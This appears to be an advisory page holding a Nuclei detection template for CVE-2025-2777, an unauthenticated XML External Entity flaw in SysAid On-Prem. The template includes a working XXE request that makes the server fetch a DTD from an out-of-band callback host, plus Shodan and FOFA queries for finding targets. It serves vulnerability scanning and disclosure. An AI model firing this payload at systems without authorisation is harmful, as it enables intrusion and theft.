漏洞描述
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.
CVE-2025-2777: SysAid On-Prem <= 23.3.40 - XML External Entity
PoC代码[已公开]
id: CVE-2025-2777
info:
name: SysAid On-Prem <= 23.3.40 - XML External Entity
author: johnk3r
severity: critical
description: |
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.
reference:
- https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
- https://documentation.sysaid.com/docs/24-40-60
classification:
epss-score: 0.0851
epss-percentile: 0.91993
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
cvss-score: 9.3
cve-id: CVE-2025-2777
cwe-id: CWE-611
metadata:
max-request: 1
vendor: sysaid
product: sysaid
shodan-query: http.favicon.hash:"1540720428"
fofa-query: icon_hash=1540720428
tags: cve,cve2025,oast,sysaid,xxe,vkev,vuln
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
%foo;
]>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Java"
# digest: 490a004630440220473d55702a5a5cf7e881869659955ae352787a9e406bb876a89e285be37c498b022067705f3d7334964ab33d65009954c4bdad4db3b9a596ad7e30a92cf1d66d51c1:922c64590222798bb761d5b6d8e72950